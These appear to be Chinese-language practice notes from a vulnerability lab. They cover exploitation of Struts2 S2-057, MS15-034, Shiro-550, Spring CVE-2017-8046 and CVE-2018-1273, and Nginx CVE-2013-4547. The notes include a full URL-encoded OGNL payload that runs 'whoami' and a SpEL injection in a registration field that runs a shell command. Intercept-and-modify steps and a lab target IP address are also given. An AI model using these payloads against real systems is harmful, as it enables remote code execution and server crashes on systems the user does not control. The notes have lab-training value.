struts2 S2-057远程执行代码漏洞
访问靶场
在url后拼接 ${(123+123)}/actionChain1.action
抓包修改值
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D
HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034
windows server 2012 IIS8.5 python运行
运行完后变蓝屏
Shiro rememberMe反序列化漏洞(Shiro-550)
进入靶场地址
抓包
修改cookie字段放入重放器
利用软件执行命令
Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
访问靶机地址http://47.121.29.111:8080/customers/1
抓包并修改数据
spring 代码执行(CVE-2018-1273)
进入靶机地址
注册抓包
添加数据
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
⽂件名逻辑漏洞(CVE-2013-4547)
进入靶机地址
上传1.jpg并抓包
在1.jpg后加空格
放行后进入uploadfiles/1.jpg...php文件抓包
修改hex